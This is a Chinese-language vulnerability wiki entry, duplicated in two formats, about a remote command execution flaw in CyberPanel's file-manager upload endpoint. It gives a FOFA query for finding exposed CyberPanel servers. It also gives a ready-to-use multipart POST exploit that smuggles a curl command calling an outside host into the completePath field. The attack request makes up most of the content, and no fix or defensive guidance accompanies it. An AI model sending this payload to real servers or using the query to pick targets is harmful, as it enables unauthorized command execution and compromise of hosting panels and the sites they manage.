fofamini-wiki

登录白背景

源码

CyberPanel upload存在远程命令执行漏洞

一、漏洞简介

CyberPanel 是一个开源的托管控制面板，它是为 VPS 和 Dedicated Servers 设计的，用于简化网站和服务的管理。它提供了易于使用的界面，允许用户进行各种服务器管理和网站托管任务，例如创建和管理网站、电子邮件账户、数据库和 DNS 记录。CyberPanel upload存在远程命令执行漏洞

二、影响版本

CyberPanel

三、资产测绘

fofaapp="CyberPanel"
特征

四、漏洞复现

POST /filemanager/upload HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----NewBoundary123456789

------NewBoundary123456789
Content-Disposition: form-data; name="domainName"

<target>
------NewBoundary123456789
Content-Disposition: form-data; name="completePath"

curl http://doveqhftgb.dgrh3.cn/
------NewBoundary123456789
Content-Disposition: form-data; name="file"; filename="poc.txt"

pwn
------NewBoundary123456789--

原文: https://www.yuque.com/xiaokp7/ocvun2/araxwguh1ngnkqst

# CyberPanel upload存在远程命令执行漏洞

# 一、漏洞简介
CyberPanel 是一个开源的托管控制面板，它是为 VPS 和 Dedicated Servers 设计的，用于简化网站和服务的管理。它提供了易于使用的界面，允许用户进行各种服务器管理和网站托管任务，例如创建和管理网站、电子邮件账户、数据库和 DNS 记录。CyberPanel upload存在远程命令执行漏洞

# 二、影响版本
+ CyberPanel

# 三、资产测绘
+ fofa`app="CyberPanel" `
+ 特征

![1730210344901-00c92fd0-1044-4bb3-ba61-363cd0e9be75.png](./img/milsv8Z6EzgE5rnQ/1730210344901-00c92fd0-1044-4bb3-ba61-363cd0e9be75-388206.png)

# 四、漏洞复现
```java
POST /filemanager/upload HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----NewBoundary123456789

------NewBoundary123456789
Content-Disposition: form-data; name="domainName"

<target>
------NewBoundary123456789
Content-Disposition: form-data; name="completePath"

curl http://doveqhftgb.dgrh3.cn/
------NewBoundary123456789
Content-Disposition: form-data; name="file"; filename="poc.txt"

pwn
------NewBoundary123456789--
```

![1730458644886-623afc02-8351-4cc4-b43d-588ce4149fee.png](./img/milsv8Z6EzgE5rnQ/1730458644886-623afc02-8351-4cc4-b43d-588ce4149fee-956301.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/araxwguh1ngnkqst>